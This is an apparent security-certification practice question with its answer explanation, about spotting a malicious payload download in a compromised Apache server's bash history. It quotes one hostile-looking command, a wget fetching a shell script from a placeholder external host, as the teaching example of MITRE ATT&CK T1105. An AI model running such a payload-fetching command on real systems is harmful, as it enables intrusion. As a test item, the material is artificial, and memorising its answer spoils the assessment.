A security analyst is reviewing the .bash_history log from a publicly facing Apache web server that was recently compromised. The analyst is looking for commands executed by the attacker to establish a foothold. Which of the following commands found in the log is the STRONGEST indicator of a malicious payload being downloaded to the server?
The correct answer is wget http://example.com/shell.sh. The use of wget, a non-interactive network downloader, to retrieve an executable script (.sh) from an external, untrusted URL is a classic technique for downloading a malicious payload. This action is a strong indicator of 'Ingress Tool Transfer' (MITRE ATT&CK T1105), in which an attacker brings external tools into the compromised environment. The other commands are legitimate and common administrative actions: ls -l /var/www/html lists the files in the webroot, tail -f /var/log/apache2/access.log monitors the access log in real time, and service apache2 restart restarts the web server service. While an attacker might use these commands for reconnaissance or to apply a configuration change, the wget command is the strongest indicator of an external payload being introduced to the system.